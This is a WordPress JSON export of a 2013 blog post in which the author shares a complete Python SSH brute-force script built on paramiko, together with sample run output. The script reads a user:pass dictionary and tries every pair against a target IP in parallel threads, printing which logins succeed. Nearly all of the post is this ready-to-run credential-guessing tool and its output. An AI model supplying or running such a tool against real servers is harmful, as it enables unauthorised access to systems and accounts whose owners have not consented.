{"id":904,"date":"2013-01-20T10:33:16","date_gmt":"2013-01-20T10:33:16","guid":{"rendered":"https:\/\/www.phillips321.co.uk:443\/?p=904"},"modified":"2013-01-20T10:33:39","modified_gmt":"2013-01-20T10:33:39","slug":"simple-python-ssh-brute-forcer","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2013\/01\/20\/simple-python-ssh-brute-forcer\/","title":{"rendered":"Simple python SSH brute forcer"},"content":{"rendered":"<p>So I got bored this evening and decided to write a quick and simple python SSH bruteforcer (I wanted to learn how to use paramiko).<\/p>\n<p>It takes the dictionary in a <em>user:pass<\/em> format.<\/p>\n<p>It&#8217;s not the most efficient as it uses a sleep (300ms) function, if i get the time to play i&#8217;ll use some form of thread queuing to ensure that you can throttle the requests. Might also be useful to reattempt SSH connect failures in order to ensure there are no missed attempts.<\/p>\n<p>But here it is anyway:<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/>33<br \/>34<br \/><\/div><\/td><td><div class=\"python codecolorer\"><span class=\"co1\">#!\/usr\/bin\/env python<\/span><br \/>\n<span class=\"kw1\">import<\/span> paramiko<span class=\"sy0\">,<\/span> <span class=\"kw3\">sys<\/span><span class=\"sy0\">,<\/span> <span class=\"kw3\">time<\/span><span class=\"sy0\">,<\/span> <span class=\"kw3\">threading<\/span><br \/>\n<br \/>\n<span class=\"kw1\">if<\/span> <span class=\"kw2\">len<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">sys<\/span>.<span class=\"me1\">argv<\/span><span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&lt;<\/span> <span class=\"nu0\">3<\/span>:<br \/>\n&nbsp; &nbsp; <span class=\"kw1\">print<\/span> <span class=\"st0\">&quot;Usage: %s IP \/path\/to\/dictionary&quot;<\/span> % <span class=\"br0\">&#40;<\/span><span class=\"kw2\">str<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">sys<\/span>.<span class=\"me1\">argv<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span><span class=\"br0\">&#93;<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw1\">print<\/span> <span class=\"st0\">&quot;Example: %s 10.0.0.1 dict.txt&quot;<\/span> % <span class=\"br0\">&#40;<\/span><span class=\"kw2\">str<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">sys<\/span>.<span class=\"me1\">argv<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span><span class=\"br0\">&#93;<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw1\">print<\/span> <span class=\"st0\">&quot;Dictionary should be in user:pass format&quot;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw3\">sys<\/span>.<span class=\"me1\">exit<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<br \/>\nip<span class=\"sy0\">=<\/span><span class=\"kw3\">sys<\/span>.<span class=\"me1\">argv<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">1<\/span><span class=\"br0\">&#93;<\/span><span class=\"sy0\">;<\/span> filename<span class=\"sy0\">=<\/span><span class=\"kw3\">sys<\/span>.<span class=\"me1\">argv<\/span><span class=\"br0\">&#91;<\/span><span class=\"nu0\">2<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<br \/>\nfd <span class=\"sy0\">=<\/span> <span class=\"kw2\">open<\/span><span class=\"br0\">&#40;<\/span>filename<span class=\"sy0\">,<\/span> <span class=\"st0\">&quot;r&quot;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<br \/>\n<span class=\"kw1\">def<\/span> attempt<span class=\"br0\">&#40;<\/span>IP<span class=\"sy0\">,<\/span>UserName<span class=\"sy0\">,<\/span>Password<span class=\"br0\">&#41;<\/span>:<br \/>\n&nbsp; &nbsp; ssh <span class=\"sy0\">=<\/span> paramiko.<span class=\"me1\">SSHClient<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; ssh.<span class=\"me1\">set_missing_host_key_policy<\/span><span class=\"br0\">&#40;<\/span>paramiko.<span class=\"me1\">AutoAddPolicy<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw1\">try<\/span>:<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; ssh.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span>IP<span class=\"sy0\">,<\/span> username<span class=\"sy0\">=<\/span>UserName<span class=\"sy0\">,<\/span> password<span class=\"sy0\">=<\/span>Password<span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw1\">except<\/span> paramiko.<span class=\"me1\">AuthenticationException<\/span>:<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; <span class=\"kw1\">print<\/span> <span class=\"st0\">'[-] %s:%s fail!'<\/span> % <span class=\"br0\">&#40;<\/span>UserName<span class=\"sy0\">,<\/span> Password<span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw1\">else<\/span>:<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; <span class=\"kw1\">print<\/span> <span class=\"st0\">'[!] %s:%s is CORRECT!'<\/span> % <span class=\"br0\">&#40;<\/span>UserName<span class=\"sy0\">,<\/span> Password<span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; ssh.<span class=\"me1\">close<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw1\">return<\/span><br \/>\n<br \/>\n<span class=\"kw1\">print<\/span> <span class=\"st0\">'[+] Bruteforcing against %s with dictionary %s'<\/span> % <span class=\"br0\">&#40;<\/span>ip<span class=\"sy0\">,<\/span> filename<span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"kw1\">for<\/span> line <span class=\"kw1\">in<\/span> fd.<span class=\"me1\">readlines<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span>:<br \/>\n&nbsp; &nbsp; username<span class=\"sy0\">,<\/span> password <span class=\"sy0\">=<\/span> line.<span class=\"me1\">strip<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span>.<span class=\"me1\">split<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">&quot;:&quot;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; t <span class=\"sy0\">=<\/span> <span class=\"kw3\">threading<\/span>.<span class=\"me1\">Thread<\/span><span class=\"br0\">&#40;<\/span>target<span class=\"sy0\">=<\/span>attempt<span class=\"sy0\">,<\/span> args<span class=\"sy0\">=<\/span><span class=\"br0\">&#40;<\/span>ip<span class=\"sy0\">,<\/span>username<span class=\"sy0\">,<\/span>password<span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; t.<span class=\"me1\">start<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <span class=\"kw3\">time<\/span>.<span class=\"me1\">sleep<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.3<\/span><span class=\"br0\">&#41;<\/span><br \/>\n&nbsp; &nbsp; <br \/>\nfd.<span class=\"me1\">close<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"kw3\">sys<\/span>.<span class=\"me1\">exit<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">0<\/span><span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And the running of the code:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"co4\">user@linux:$ <\/span>python ssh-dict.py 127.0.0.1 dict<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> Bruteforcing against 127.0.0.1 with dictionary dict<br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> user:pass fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> admin:password fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> guest:password1 fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> kerry:test fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"co0\">##### SNIP<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> user5:password6 fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> user5:password7 fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">!<\/span><span class=\"br0\">&#93;<\/span> validuser:validpassword is CORRECT<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>-<span class=\"br0\">&#93;<\/span> user5:password8 fail<span class=\"sy0\">!<\/span><br \/>\n<span class=\"co0\">##### SNIP<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>So I got bored this evening and decided to write a quick and simple python SSH bruteforcer (I wanted to learn how to use paramiko). It takes the dictionary in a user:pass format. It&#8217;s not the most efficient as it uses a sleep (300ms) function, if i get the time to play i&#8217;ll use some [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[37,343,111,9],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/904"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=904"}],"version-history":[{"count":4,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/904\/revisions"}],"predecessor-version":[{"id":909,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/904\/revisions\/909"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=904"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=904"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=904"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}